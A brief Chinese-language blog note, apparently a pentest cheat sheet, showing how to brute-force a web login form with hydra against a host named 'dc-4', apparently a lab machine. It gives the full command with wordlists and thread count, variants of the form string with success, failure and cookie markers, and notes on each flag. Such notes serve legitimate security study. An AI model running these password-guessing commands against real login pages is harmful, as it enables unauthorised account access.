hydra attack web form

发表于 |
字数统计: 129 字 | 阅读时长 ≈ 1 分钟
在 Burp 的 Intruder 功能受限(Pro)的环境下爆破 Web后台时,可以使用 hydra 
1
2
3
hydra -L users.txt -P password.txt \
-s 80 -t 30 dc-4 --http-post-form \
"/login.php:username=^USER^&password=^PASS^:S=Command"

1
"/login.php:username=^USER^&password=^PASS^:S=Command"
1
2
"/login.php:username=^USER^&password=^PASS^:Login Failed"
"/login.php:username=^USER^&password=^PASS^:F=Login Failed"
1
"/login.php:username=^USER^&password=^PASS^:S=Command:H=Cookie=xxxx"

  • <Error Message>不止搜索 html 信息,还包括 http 头(S=302
  • form 不是 from
  • S:登陆成功后 rsp 返回内容的关键词
  • F 或无标志,登陆失败信息
  • H:请求头信息

Ref